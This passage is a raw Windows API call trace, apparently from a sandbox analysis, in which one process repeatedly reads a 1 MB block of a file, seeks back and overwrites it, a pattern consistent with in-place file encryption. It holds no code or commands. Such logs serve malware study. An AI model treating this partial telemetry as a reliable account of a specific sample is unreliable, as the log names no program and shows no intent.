lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.922] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.922] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.923] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.934] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.934] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.935] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.959] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.959] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.961] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.977] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.977] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.979] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.992] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.992] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.994] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.009] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.010] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.011] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.021] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.021] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.023] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.059] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.059] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.061] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.108] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.108] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.110] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.128] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.128] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.129] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.138] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.138] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.141] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.151] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.151] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.153] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.164] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.164] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.166] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.192] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.192] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.194] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.238] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.238] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.240] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.257] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.257] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.259] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.273] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.273] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.275] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.300] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.300] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.301] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.317] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.317] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.318] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.331] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.331] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.333] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.359] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.359] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.361] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.387] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.387] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.388] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.399] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.399] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.402] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.425] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.425] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.427] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.469] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.469] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.471] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.495] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.495] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.498] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.512] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.512] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.514] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.541] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.541] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.543] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.570] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.571] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.572] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.590] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.590] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.592] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.607] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.607] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.639] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.657] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.657] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.668] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.682] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.682] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.685] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.702] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.702] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.704] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.718] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.718] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.721] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.851] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.852] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.888] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.902] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.902] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.904] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.919] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.919] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.951] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.962] SetFilePointerEx (in: 